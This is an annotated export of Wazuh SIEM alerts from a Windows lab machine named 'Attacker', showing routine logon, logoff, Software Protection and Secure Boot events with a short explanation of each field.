id: 1745533882.53416 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:05.5675781Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43451 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533882.60751 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:43:41.5201262Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2355 Incremental log record number – handy for timeline order.
data.win.system.processID: 10268 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:41Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-18T16:36:41Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533883.62331 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.5733269Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43455 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FC0D
Linked Logon ID: 0x1E7FD31
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fc0d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x1e7fd31 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533883.70051 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:53:02.6493207Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2359 Incremental log record number – handy for timeline order.
data.win.system.processID: 9524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:37:02Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-18T16:37:02Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533883.71629 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.5733520Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43456 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FD31
Linked Logon ID: 0x1E7FC0D
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fd31 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x1e7fc0d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.79347 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-TPM-WMI No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {7d5387b0-cbe0-11da-a94d-0800200c9a66} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1796 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:38:01.9174262Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2887 Incremental log record number – handy for timeline order.
data.win.system.processID: 12516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12400 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hResult: -2147020471 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.80933 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.5862980Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43458 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11484 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FD31
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fd31 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.83399 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.6073282Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43459 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11484 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
